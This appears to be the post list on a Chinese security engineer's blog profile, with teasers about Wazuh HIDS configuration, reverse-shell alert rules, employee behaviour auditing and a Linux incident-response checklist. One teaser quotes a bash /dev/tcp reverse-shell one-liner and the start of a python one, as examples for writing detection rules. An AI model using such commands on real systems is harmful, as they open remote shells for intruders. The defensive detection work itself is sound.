发简信
IP属地:黑龙江
-
安全工程师如何快速适应新企业及一些新员工感悟
加入MT刚好3个月整,来记录一些自己的发现和感悟。 入职第一周-如何快速进入工作状态 和所有新人一样,公司的新人培训计划提供了很多了解公司以及如...
-
Wauzh原理简析及audit规则风险评估
HIDS基本原理 熟悉HIDS的朋友应该了解,服务器的shell监控一般有两种,一种依靠Linux的audit审计功能,比如Wazuh,一种是重...
-
企业安全-浅谈员工行为监控
我目前就职于一家私企的安全部,主要做安全审计的工作,很多公司的离职流程没有考虑过员工的异常行为审计,18年我在逛微博的时候看到google的一条...
-
Wauzh自定义反弹shell告警规则常见反弹: bash -i >& /dev/tcp/ip/port0>&1 python -c"import os,socket,subproc...
-
Wazuh配置使用腾讯企业邮箱告警
测试环境: CentOS Linux release 7.6.1810 Wazuh 3.10.2 1、wazuh服务器上安装postfii及相关...
-
开源HIDS-Wauzh功能测试一、Wazuh 守护进程及工具进程 守护进程 ossec-agentd https://documentation.wazuh.com/3.10...
-
开源HIDS-Wauzh测试使用
Wazuh简介 前端时间调研了一些HIDS的开源系统: https://github.com/Neo23x0/Fenrir更加方便(不需要安装代...
-
应急响应-Linux应急排查手册
账号排查 grep :0: /etc/passwd #检查是否产生了新用户,和UID、GID为0的用户 stat /etc/passwd #检查...
-
git blame使用
命令名称: git-blame - 显示文件的每一行最后修改的版本和作者 用法: git blame [-c] [-b] [-l...